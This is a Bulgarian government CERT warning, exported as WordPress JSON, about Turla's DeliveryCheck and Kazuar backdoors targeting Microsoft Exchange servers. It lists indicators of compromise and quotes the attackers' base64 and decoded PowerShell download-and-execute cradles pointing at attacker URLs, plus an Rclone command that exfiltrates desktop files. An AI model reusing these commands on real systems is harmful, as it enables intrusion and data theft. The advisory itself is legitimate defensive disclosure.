O\u0442 Microsoft \u0438 CERT-UA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0432\u0430\u0442 \u0437\u0430 \u043d\u043e\u0432 \u0432\u0438\u0434 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430\u0441\u043e\u0447\u0435\u043d\u0438 \u043a\u044a\u043c \u0437\u0430\u0449\u0438\u0442\u043d\u0438\u0442\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0438 \u043d\u0430 Microsoft Exchange \u0441\u044a\u0440\u0432\u044a\u0440\u0438\u0442\u0435 \u0441 \u043d\u043e\u0432 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0435\u043d \u043a\u043e\u0434 DeliveryCheck.<\/p>\n\n\n\n
\u0417\u0430\u0434 \u0430\u0442\u0430\u043a\u0430\u0442\u0430 \u0441\u0442\u043e\u0438 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 Turla, \u0441\u043f\u043e\u043d\u0441\u043e\u0440\u0438\u0440\u0430\u043d\u0430 \u043e\u0442 \u0420\u0443\u0441\u043a\u0430\u0442\u0430 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u044f. \u041f\u044a\u0440\u0432\u0430\u0442\u0430 \u0444\u0430\u0437\u0430 \u043d\u0430 \u0430\u0442\u0430\u043a\u0430\u0442\u0430 \u0432\u043a\u043b\u044e\u0447\u0432\u0430 \u0438\u0437\u043f\u0440\u0430\u0449\u0430\u043d\u0435 \u043d\u0430 phishing email \u0441 \u043f\u0440\u0438\u043a\u0430\u0447\u0435\u043d Excel XLSM \u0444\u0430\u0439\u043b, \u043a\u043e\u0439\u0442\u043e \u0441\u044a\u0434\u044a\u0440\u0436\u0430 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0435\u043d macros \u0441\u043a\u0440\u0438\u043f\u0442. \u041f\u0440\u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u0430\u043d\u0435 \u043d\u0430 \u0442\u043e\u0437\u0438 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441\u0435 \u0441\u0442\u0430\u0440\u0442\u0438\u0440\u0430 PowerShell \u043a\u043e\u043c\u0430\u043d\u0434\u0430, \u043a\u043e\u044f\u0442\u043e \u0441\u044a\u0437\u0434\u0430\u0432\u0430 scheduled task (\u043f\u043b\u0430\u043d\u0438\u0440\u0430\u043d\u0430 \u0437\u0430\u0434\u0430\u0447\u0430), \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u044f\u0449 \u0441\u0435 \u0437\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043d\u0430 Firefox \u0431\u0440\u0430\u0443\u0437\u044a\u0440. \u0422\u043e\u0437\u0438 task \u0438\u0437\u0442\u0435\u0433\u043b\u044f DeliveryCheck backdoor, \u0441\u0442\u0430\u0440\u0442\u0438\u0440\u0430 \u0441\u0435 \u0432 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0430\u0442\u0430 \u043f\u0430\u043c\u0435\u0442, \u043e\u0441\u044a\u0449\u0435\u0441\u0442\u0432\u044f\u0432\u0430 \u0432\u0440\u044a\u0437\u043a\u0430 \u0441 Command & Control \u0441\u044a\u0440\u0432\u044a\u0440 \u043d\u0430 Turla, \u043e\u0442 \u043a\u044a\u0434\u0435\u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u0432\u0430 \u043e\u0442\u0434\u0430\u043b\u0435\u0447\u0435\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0438 \u0437\u0430 \u0438\u0437\u043f\u044a\u043b\u043d\u044f\u0432\u0430\u043d\u0435 \u0438 \u0438\u043d\u0441\u0442\u0430\u043b\u0438\u0440\u0430\u043d\u0435 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u0438 \u043a\u043e\u0434\u043e\u0432\u0435.<\/p>\n\n\n\n
\u0421\u043b\u0435\u0434 \u0437\u0430\u0440\u0430\u0437\u044f\u0432\u0430\u043d\u0435 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0442\u0430 \u0441 backdoor-\u0430 \u0441\u0435 \u0438\u0437\u043f\u043e\u043b\u0437\u0432\u0430 \u0437\u0430 \u0438\u0437\u0432\u043b\u0438\u0447\u0430\u043d\u0435 \u043d\u0430 \u0434\u0430\u043d\u043d\u0438 \u043e\u0442 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0430\u043d\u0438\u0442\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0447\u0440\u0435\u0437 \u0438\u0437\u043f\u043e\u043b\u0437\u0432\u0430\u043d\u0435 \u043d\u0430 Rclone (\u0431\u0435\u0437\u043f\u043b\u0430\u0442\u0435\u043d \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0437\u0430 \u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0438\u0440\u0430\u043d\u0435 \u043d\u0430 \u0444\u0430\u0439\u043b\u043e\u0432\u0435 \u043a\u044a\u043c \u0438 \u043e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u0438 Cloud \u0434\u043e\u0441\u0442\u0430\u0432\u0447\u0438\u0446\u0438)<\/p>\n\n\n\n
\u0414\u0440\u0443\u0433\u043e \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u043e \u0437\u0430 DeliveryCheck \u0435, \u0447\u0435 \u043f\u0440\u0435\u0432\u0440\u044a\u0449\u0430 Microsoft Exchange \u043f\u043e\u0449\u0435\u043d\u0441\u043a\u0438 \u0441\u044a\u0440\u0432\u044a\u0440 \u0432 \u043e\u0442\u0434\u0430\u043b\u0435\u0447\u0435\u043d Command & Control \u0441\u044a\u0440\u0432\u044a\u0440, \u043a\u043e\u0439\u0442\u043e \u043e\u0442 \u0441\u0432\u043e\u044f \u0441\u0442\u0440\u0430\u043d\u0430 \u0441\u0442\u0430\u0432\u0430 \u0447\u0430\u0441\u0442 \u043e\u0442 \u0441\u0445\u0435\u043c\u0430\u0442\u0430 \u043d\u0430 \u0440\u0430\u0437\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435. \u0418\u043d\u0441\u0442\u0430\u043b\u0438\u0440\u0430 \u0441\u0435 \u0447\u0440\u0435\u0437 Desired State Configuration (DSC), \u043a\u043e\u0435\u0442\u043e \u0435 PowerShell \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u043d\u043e\u0441\u0442, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0430\u0449\u0430 \u043d\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0438\u0442\u0435 \u0434\u0430 \u0441\u044a\u0437\u0434\u0430\u0432\u0430\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0438\u0437\u0438\u0440\u0430\u043d\u0430 \u0441\u044a\u0440\u0432\u044a\u0440\u043d\u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438, \u0438 \u0434\u0430 \u044f \u043f\u0440\u0438\u043b\u0430\u0433\u0430\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u043d\u043e \u043d\u0430 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430. \u0421\u044a\u0437\u0434\u0430\u0432\u0430 \u0441\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f, \u043a\u043e\u044f\u0442\u043e \u0437\u0430\u0440\u0430\u0436\u0434\u0430 base64 \u0441\u0442\u0440\u0438\u043d\u0433, \u043a\u043e\u0439\u0442\u043e \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0432\u0430 \u0438\u0437\u043f\u044a\u043b\u043d\u0438\u043c \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0435\u043d \u0444\u0430\u0439\u043b. \u0422\u0430\u043a\u0430 Microsoft Exchange \u0441\u044a\u0440\u0432\u044a\u0440\u0438\u0442\u0435 \u0441\u0435 \u043f\u0440\u0435\u0432\u0440\u044a\u0449\u0430\u0442 \u0432 \u0441\u044a\u0440\u0432\u044a\u0440\u0438 \u0437\u0430 \u0440\u0430\u0437\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0430 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0435\u043d\u0438\u044f \u043a\u043e\u0434.<\/p>\n\n\n\n
\u0412 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0430\u043d\u0438\u0442\u0435 \u0430\u0442\u0430\u043a\u0438 Turla \u0438\u043d\u0441\u0442\u0430\u043b\u0438\u0440\u0430\u0442 KAZUAR backdoor \u0441 \u0446\u0435\u043b \u0438\u0437\u0432\u043b\u0438\u0447\u0430\u043d\u0435 \u043d\u0430 \u0434\u0430\u043d\u043d\u0438. \u0422\u043e\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0430 \u043f\u044a\u043b\u0435\u043d \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436, \u0432\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u043d\u043e \u0438\u0437\u043f\u044a\u043b\u043d\u0435\u043d\u0438\u0435 \u043d\u0430 javascript \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0442\u0430, \u043a\u0440\u0430\u0436\u0431\u0430 \u043d\u0430 \u0434\u0430\u043d\u043d\u0438 \u043e\u0442 event logs, \u043a\u0440\u0430\u0436\u0431\u0430 \u043d\u0430 authentication tokens, \u043a\u0440\u0430\u0436\u0431\u0430 \u043d\u0430 \u0431\u0438\u0441\u043a\u0432\u0438\u0442\u043a\u0438, \u0430\u043a\u0430\u0443\u043d\u0442\u0438 \u043e\u0442 \u0441\u043e\u0444\u0442\u0443\u0435\u0440, \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u043d\u043e \u043e\u0442 \u0431\u0440\u0430\u0443\u0437\u044a\u0440\u0438, FTP \u043a\u043b\u0438\u0435\u043d\u0442\u0438, VPN \u043a\u043b\u0438\u0435\u043d\u0442\u0438, KeePass, Azure, AWS, \u0438 Outlook \u0430\u043a\u0430\u0443\u043d\u0442\u0438. \u041e\u0441\u0432\u0435\u043d \u0442\u043e\u0432\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0430 \u0435\u043a\u0441\u0444\u0438\u043b\u0442\u0440\u0438\u0440\u0430\u043d\u0435 \u043d\u0430 \u0441\u044a\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043d\u0430 Signal Desktop \u043a\u043b\u0438\u0435\u043d\u0442, \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u043d\u043e \u0438 \u0438\u0437\u043f\u0440\u0430\u0442\u0435\u043d\u0438 \u0438\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u0435.<\/p>\n\n\n\n
IoC:<\/p>\n\n\n\n
cdf7fa901701ea1ef642aeb271c70361 1c97f92a144ac17e35c0e40dc89e12211ef5a7d5eb8db57ab093987ae6f3b9dc localhost.mof (CAPIBAR server (MOF))<\/p>\n\n\n\n
153b713b3c6e642f39993d65ab33c5f0 5cf64f37fac74dc8f3dcb58831c3f2ce2b3cf522db448b40acdab254dd46cb3e Pending.mof (CAPIBAR server (MOF))<\/p>\n\n\n\n
9ececb4acbf692c2a8ea411f2e7dd006 07f9b090172535089eb62a175e5deaf95853fdfd4bcabf099619c60057d38c57 Server.dll (CAPIBAR server)<\/p>\n\n\n\n
5c7466a177fcaad2ebab131a54c28fab bd7dbaf91ba162b6623292ebcdd2768c5d87e518240fe8ca200a81e9c7f01d76 Control.dll (CAPIBAR)<\/p>\n\n\n\n
b63c2ec9a631e0217d39c4a43527a0ce 1c1bb64e38c3fbe1a8f0dcb94ded96b332296bcbf839de438a4838fb43b20af3 logon.aspx<\/p>\n\n\n\n
420b7dc391f2cb0a9a684c1c48c334e2 01c5778be73c10c167fae6d7970c0be23a29af1873d743419b1803c035d92ef7 logon[1].aspx<\/p>\n\n\n\n
491e462bf1213fede82925dea5df8fff ba2c8df04bcba5c3cfd343a59d8b59b76779e6c27eb27b7ac73ded97e08f0f39 logon[1].aspx<\/p>\n\n\n\n
9dd2bea4f2df8d3ef51dc10c6db2e07a aaf7642f0cab75240ec65bc052a0a602366740b31754156b3a0c44dccec9bebe SYNC[1]<\/p>\n\n\n\n
8c56c22343853d3797037bdac2cec6c7 d4d7c12bdb66d40ad58c211dc6dd53a7494e03f9883336fa5464f0947530709f wp-file-script.js<\/p>\n\n\n\n
17402fc21c7bafae2c1a149035cd0835 19b7ddd3b06794abe593bf533d88319711ca15bb0a08901b4ab7e52aab015452 Control.dll (CAPIBAR)<\/p>\n\n\n\n
d3065b4b1e8f6ecb63685219113ff0b8 4ef8db0ca305aaab9e2471b198168021c531862cb4319098302026b1cfa89947 Control.dll (CAPIBAR)<\/p>\n\n\n\n
5210b3d85fd0026205baee2c77ac0acd 64e8744b39e15b76311733014327311acd77330f8a135132f020eac78199ac8a two.exe (CAPIBAR)<\/p>\n\n\n\n
4065e647380358d22926c24a63c26ac4 5e122ff3066b6ef2a89295df925431c151f1713708c99772687a30c3204064bd Config.dat<\/p>\n\n\n\n
11a289347b95aab157aa0efe4a59bf24 91dc8593ee573f3a07e9356e65e06aed58d8e74258313e3414a7de278b3b5233 Senatorial.exe (KAZUAR)<\/p>\n\n\n\n
cba1f4c861240223332922d2913d18e5 b8ee794b04b69a1ee8687daabfe4f912368a500610a099e3072b03eeb66077f8 1.ps1<\/p>\n\n\n\n
65102299bf8d7f0129ebbcb08a9c2d98 8168dc0baea6a74120fbabea261e83377697cb5f9726a2514f38ed04b46c56c8 message (Steel Signal’s „config.json“, „db.sqlite“)<\/p>\n\n\n\n
C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\ASKOD\\localhost.mof<\/p>\n\n\n\n
C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\ZOV\\localhost.mof<\/p>\n\n\n\n
C:\\Windows\\System32\\Configuration\\Pending.mof<\/p>\n\n\n\n
C:\\ProgramData\\ASUS\\ASUS System Control Interface\\AsusSoftwareManager\\Config.dat<\/p>\n\n\n\n
%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\8HIA0N4E\\logon[1].aspx<\/p>\n\n\n\n
%LOCALAPPDATA%\\assembly\\dl3\\QKP9W8EK.5CJ\\XRNLX3QV.5BO\\3d7183c9\\00000000_00000000\\__AssemblyInfo__.ini<\/p>\n\n\n\n
%LOCALAPPDATA%\\assembly\\dl3\\QKP9W8EK.5CJ\\XRNLX3QV.5BO\\3d7183c9\\00000000_00000000\\logon.aspx<\/p>\n\n\n\n
%LOCALAPPDATA%\\Microsoft\\OneDrive\\Update\\UpdateService.exe<\/p>\n\n\n\n
%LOCALAPPDATA%\\Microsoft\\OneDrive\\Update\\rclone.conf<\/p>\n\n\n\n
%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\UOIQCADZ\\SYNC[1]<\/p>\n\n\n\n
powershell -e JAB3AD0AbgBlAFcALQBPAGIAagBFAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQAZgBpAGwAZQA9ACQAdwAuAEQAbwB3AG4ATABvAGEAZABTAHQAUgBpAE4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBkAGUAbABhAGkAZABhAC4AdQBhAC8AcABsAHUAZwBpAG4AcwAvAHYAbQBzAGUAYQByAGMAaAAvAHcAcAAtAGMAbwBuAGYAaQBnAC0AdABoAGUAbQBlAHMALgBwAGgAcAAnACkAOwBpAEUAeAAgACQAZgBpAGwAZQA=<\/p>\n\n\n\n
powershell -e JABHAHIAcQBkAHEAdwBkAGUAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwBZAHMAVABlAE0ALgBOAEUAdAAuAFcAZQBiAEMATABpAGUATgB0ADsAJABpAHUAYQBXAD0AJABHAHIAcQBkAHEAdwBkAGUALgBEAE8AdwBOAEwATwBhAEQAUwB0AFIAaQBOAGcAKAAnAGgAVAB0AFAAcwA6AC8ALwBhAGwAZQBpAG0AcABvAHIAdABhAGQAbwByAGEALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AcwBsAGkAZABlAHMAXwBsAG8AZwBvAC8AJwApADsAYABpAG4AdgBPAGAASwBlAGAALQBgAEUAeABgAFAAcgBlAHMAcwBgAEkAbwBgAE4AIAAkAGkAdQBhAFcA<\/p>\n\n\n\n
$w=neW-ObjEct system.net.wEbcLieNt;$file=$w.DownLoadStRiNg(‘hxxps:\/\/www.adelaida[.]ua\/plugins\/vmsearch\/wp-config-themes.php’);iEx $file<\/p>\n\n\n\n
$Grqdqwde=New-ObjEcT SYsTeM.NEt.WebCLieNt;$iuaW=$Grqdqwde.DOwNLOaDStRiNg(‘hxxPs:\/\/aleimportadora[.]net\/images\/slides_logo\/’);invOKe-ExPressIoN $iuaW<\/p>\n\n\n\n
„C:\\Users\\%USERNAME%\\AppData\\Local\\Microsoft\\OneDrive\\Update\\UpdateService.exe“ „copy“ „C:\\Users\\%USERNAME%\\Desktop“ „remote:%COMPUTERNAME%\\Desktop“ „–include“ „*.{{jpe?g|txt|docx?|rtf|pdf|xlsx?|xlsm|pptx?|zip|rar|7z}}“ „-M“ „–max-size“ „50M“ „–max-age“ „200d“ „–bwlimit“ „1M:1M“ „–order-by“ „modtime,desc“ „–log-file=C:\\Users\\%USERNAME%\\AppData\\Local\\Microsoft\\OneDrive\\Update\\log_1.dat“ „-vv“<\/p>\n\n\n\n
\\Mozilla\\Updates Firefox Browser (Scheduled Task)<\/p>\n\n\n\n
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling<\/p>\n\n\n\n
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling\\Maleness<\/p>\n\n\n\n
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling\\Maleness1<\/p>\n\n\n\n
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Gentling\\Maleness2<\/p>\n\n\n\n
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\GameBarApi\\GameBarId<\/p>\n\n\n\n
HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\\InprocServer32\\1.0.0.0\\CodeBase<\/p>\n\n\n\n
HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{8989946A-2F3B-4BE9-874E-D0B2B534ACA0}\\ScriptletURL<\/p>\n\n\n\n
HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{84f0fae1-c27b-4f6f-807b-28cf6f96287d}\\ScriptletURL<\/p>\n\n\n\n
\u041c\u0440\u0435\u0436\u043e\u0432\u0438 IoC:<\/p>\n\n\n\n
hXXps:\/\/www.adelaida[.]ua\/plugins\/vmsearch\/wp-config-plugins.php<\/p>\n\n\n\n
hXXps:\/\/www.adelaida[.]ua\/plugins\/vmsearch\/wp-config-themes.php<\/p>\n\n\n\n
hXXps:\/\/www.adelaida[.]ua\/plugins\/vmsearch\/wp-file-script.js<\/p>\n\n\n\n
hXXps:\/\/atomydoc[.]kg\/src\/open_center\/<\/p>\n\n\n\n
hXXps:\/\/atomydoc[.]kg\/src\/open_center\/?page=ccl<\/p>\n\n\n\n
hXXps:\/\/atomydoc[.]kg\/src\/open_center\/?page=fst<\/p>\n\n\n\n
hXXps:\/\/atomydoc[.]kg\/src\/open_center\/?page=snd<\/p>\n\n\n\n
hXXps:\/\/atomydoc[.]kg\/src\/open_center\/?page=trd<\/p>\n\n\n\n
hXXps:\/\/aleimportadora[.]net\/images\/slides_logo\/<\/p>\n\n\n\n
hXXps:\/\/aleimportadora[.]net\/images\/slides_logo\/?page=<\/p>\n\n\n\n
hXXps:\/\/aleimportadora[.]net\/images\/slides_logo\/fg\/message<\/p>\n\n\n\n
hXXps:\/\/aleimportadora[.]net\/images\/slides_logo\/fg\/music<\/p>\n\n\n\n
hXXps:\/\/aleimportadora[.]net\/images\/slides_logo\/fg\/video<\/p>\n\n\n\n
hXXps:\/\/aleimportadora[.]net\/images\/slides_logo\/index.php<\/p>\n\n\n\n
hXXps:\/\/octoberoctopus.co[.]za\/wp-includes\/sitemaps\/web\/<\/p>\n\n\n\n
hXXps:\/\/sansaispa[.]com\/wp-includes\/images\/gallery\/<\/p>\n\n\n\n
hXXps:\/\/www.pierreagencement[.]fr\/wp-content\/languages\/index.php<\/p>\n\n\n\n
hXXps:\/\/mail.aet.in[.]ua\/outlook\/api\/logon.aspx<\/p>\n\n\n\n
hXXps:\/\/mail.kzp[.]bg\/outlook\/api\/logon.aspx<\/p>\n\n\n\n
hXXps:\/\/mail.numina[.]md\/owa\/scripts\/logon.aspx (CAPIBAR C2URL)<\/p>\n\n\n\n
hXXps:\/\/mail.aet.in[.]ua\/outlook\/api\/logoff.aspx (CAPIBAR C2URL)<\/p>\n\n\n\n
hXXps:\/\/mail.arlingtonhousing[.]us\/outlook\/api\/logoff.aspx (CAPIBAR C2URL)<\/p>\n\n\n\n
hXXps:\/\/mail.kzp[.]bg\/outlook\/api\/logoff.aspx (CAPIBAR C2URL)<\/p>\n\n\n\n
hXXps:\/\/mail.lechateaudelatour[.]fr\/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE\/RPCWITHCERT\/SYNC (CAPIBAR C2URL)<\/p>\n\n\n\n
hXXps:\/\/mail.lebsack[.]de\/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE\/RPCWITHCERT\/SYNC (CAPIBAR C2URL)<\/p>\n\n\n\n
\u0418\u0437\u0442\u043e\u0447\u043d\u0438\u0438\u043a \u043d\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f:<\/p>\n\n\n\n
https:\/\/cert.gov.ua\/article\/5213167<\/a><\/p>\n\n\n\n <\/p>","protected":false},"excerpt":{"rendered":" O\u0442 Microsoft \u0438 CERT-UA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0432\u0430\u0442 \u0437\u0430 \u043d\u043e\u0432 \u0432\u0438\u0434 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430\u0441\u043e\u0447\u0435\u043d\u0438 \u043a\u044a\u043c \u0437\u0430\u0449\u0438\u0442\u043d\u0438\u0442\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0438 \u043d\u0430 Microsoft Exchange \u0441\u044a\u0440\u0432\u044a\u0440\u0438\u0442\u0435 \u0441 \u043d\u043e\u0432 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0435\u043d \u043a\u043e\u0434 DeliveryCheck. \u0417\u0430\u0434 \u0430\u0442\u0430\u043a\u0430\u0442\u0430 \u0441\u0442\u043e\u0438 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 Turla, \u0441\u043f\u043e\u043d\u0441\u043e\u0440\u0438\u0440\u0430\u043d\u0430 \u043e\u0442 \u0420\u0443\u0441\u043a\u0430\u0442\u0430 \u0424\u0435\u0434\u0435\u0440\u0430\u0446\u0438\u044f. \u041f\u044a\u0440\u0432\u0430\u0442\u0430 \u0444\u0430\u0437\u0430 \u043d\u0430 \u0430\u0442\u0430\u043a\u0430\u0442\u0430 \u0432\u043a\u043b\u044e\u0447\u0432\u0430 \u0438\u0437\u043f\u0440\u0430\u0449\u0430\u043d\u0435 \u043d\u0430 phishing email \u0441 \u043f\u0440\u0438\u043a\u0430\u0447\u0435\u043d Excel XLSM \u0444\u0430\u0439\u043b, \u043a\u043e\u0439\u0442\u043e \u0441\u044a\u0434\u044a\u0440\u0436\u0430 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u0435\u043d macros \u0441\u043a\u0440\u0438\u043f\u0442. \u041f\u0440\u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u0430\u043d\u0435 \u043d\u0430 \u0442\u043e\u0437\u0438 … Read more<\/a><\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[44],"tags":[],"class_list":["post-3315","post","type-post","status-publish","format-standard","hentry","category-warnings"],"_links":{"self":[{"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/posts\/3315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/comments?post=3315"}],"version-history":[{"count":2,"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/posts\/3315\/revisions"}],"predecessor-version":[{"id":3363,"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/posts\/3315\/revisions\/3363"}],"wp:attachment":[{"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/media?parent=3315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/categories?post=3315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.govcert.bg\/en\/wp-json\/wp\/v2\/tags?post=3315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}